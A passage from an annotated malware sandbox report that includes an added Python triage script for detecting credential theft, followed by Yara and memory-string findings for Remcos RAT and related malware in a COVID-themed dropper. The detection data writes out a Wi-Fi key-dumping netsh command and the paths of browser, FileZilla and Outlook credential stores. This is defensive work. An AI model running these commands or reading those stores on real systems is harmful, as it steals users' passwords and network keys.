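Added example; not code from the Joe Sandbox report or from the sample.
Event records are constructed to mirror the report's "Process created",
"File opened" and "Key opened" lines; the field names are assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Credential stores named in the report, with the user directory generalised.
# Each tuple: path pattern, finding label, processes that legitimately own it.
# key4.db / logins.json are the current Firefox stores (well known; the report
# itself only shows the legacy key3.db).
CRED_STORES = [
    (re.compile(r"\\appdata\\local\\google\\chrome\\user data\\[^\\]+\\(login data|cookies)$"),
     "chrome_credential_store", {"chrome.exe"}),
    (re.compile(r"\\appdata\\roaming\\mozilla\\firefox\\profiles\\[^\\]+\\(key3\.db|key4\.db|logins\.json)$"),
     "firefox_credential_store", {"firefox.exe"}),
    (re.compile(r"\\appdata\\roaming\\filezilla\\(recentservers|sitemanager)\.xml$"),
     "filezilla_credential_store", {"filezilla.exe"}),
]
# Outlook MAPI profile hive that dwnl.exe opened in the report.
OUTLOOK_PROFILES = re.compile(
    r"^hkey_current_user\\software\\microsoft\\windows nt\\currentversion\\"
    r"windows messaging subsystem\\profiles", re.I)
# "netsh wlan show profile" lists saved SSIDs; adding key=clear dumps the PSK.
NETSH_WLAN = re.compile(r"\bwlan\s+show\s+profiles?\b", re.I)


@dataclass
class Finding:
    process: str
    label: str
    severity: str
    detail: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(events: List[Dict[str, str]]) -> List[Finding]:
    """Return one Finding per event that matches a credential-theft pattern."""
    findings: List[Finding] = []
    for ev in events:
        proc = _basename(ev["image"])
        if ev["event"] == "process_create":
            cmd = ev["cmdline"]
            if _basename(ev["child"]) == "netsh.exe" and NETSH_WLAN.search(cmd):
                sev = "high" if "key=clear" in cmd.lower() else "medium"
                findings.append(Finding(proc, "wlan_profile_harvest", sev, cmd))
        elif ev["event"] == "file_open":
            path = ev["path"].lower()
            for pattern, label, owners in CRED_STORES:
                # The owning browser/client reading its own store is normal.
                if pattern.search(path) and proc not in owners:
                    findings.append(Finding(proc, label, "high", ev["path"]))
        elif ev["event"] == "key_open":
            if OUTLOOK_PROFILES.search(ev["path"]) and proc != "outlook.exe":
                findings.append(Finding(proc, "outlook_profile_access", "high", ev["path"]))
    return findings


DWNL = r"C:\Users\user\AppData\Local\Temp\dwnl.exe"
DROPPER = r"C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe"

# Constructed events. The first five are modelled on lines in the report (the
# Firefox profile name is invented); the key=clear command and the two benign
# events are added to show the severity step and the owner allow-list.
SAMPLE_EVENTS = [
    {"event": "process_create", "image": DWNL, "child": r"C:\Windows\SysWOW64\netsh.exe",
     "cmdline": "netsh wlan show profile"},
    {"event": "file_open", "image": DWNL,
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"event": "file_open", "image": DWNL,
     "path": r"C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml"},
    {"event": "key_open", "image": DWNL,
     "path": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
    {"event": "file_open", "image": DROPPER,
     "path": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\abcd1234.default\key3.db"},
    {"event": "process_create", "image": DWNL, "child": r"C:\Windows\SysWOW64\netsh.exe",
     "cmdline": 'netsh wlan show profile name="Office" key=clear'},
    {"event": "file_open", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies"},
    {"event": "process_create", "image": r"C:\Windows\explorer.exe",
     "child": r"C:\Windows\System32\netsh.exe", "cmdline": "netsh interface show interface"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.severity:6} {f.process:40} {f.label:28} {f.detail}")
```

Run against the sample events, the two benign records (Chrome reading its own Cookies file, explorer.exe launching a non-wlan netsh) produce nothing, while every dwnl.exe and dropper access is reported. In production the owner allow-list needs the backup agents and password managers in your estate added, and the netsh rule should be paired with the parent image, since `netsh wlan show profile` typed by a help-desk technician from cmd.exe is common and the same command spawned from a Temp-directory executable is not.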

Remote Access Functionality:

Yara detected Matiex Keylogger
Source: Yara match (same UNPACKEDPE, MEMORY, MEMORYSTR and DROPPED matches as listed under Stealing of Sensitive Information above)
Yara detected Telegram RAT
Source: Yara match (same MEMORY and MEMORYSTR matches as listed under Stealing of Sensitive Information above)
Yara detected Remcos RAT
Source: Yara match (same UNPACKEDPE, MEMORY and MEMORYSTR matches as listed under Stealing of Sensitive Information above)
Detected Remcos RAT
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.418169362.0000000002F23000.00000004.00000001.sdmp String found in binary or memory: Remcos_Mutex_Inj
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.418169362.0000000002F23000.00000004.00000001.sdmp String found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
Source: UK COVID UPDATES AND ENTITLEMENT.exe String found in binary or memory: Remcos_Mutex_Inj
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp String found in binary or memory: \uninstall.batEXEpathC:\WINDOWS\system32\userinit.exeexplorer.exeupdate.batAppDataProgramFiles\SysWOW64\system32WinDirSystemDrive@@ (32 bit) (64 bit)SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameInjRemcos_Mutex_InjSoftware\SetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWIsWow64Processkernel32kernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\SETTINGS
Contains functionality to launch and control a shell (cmd.exe)
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: cmd.exe 28_2_0040E8B9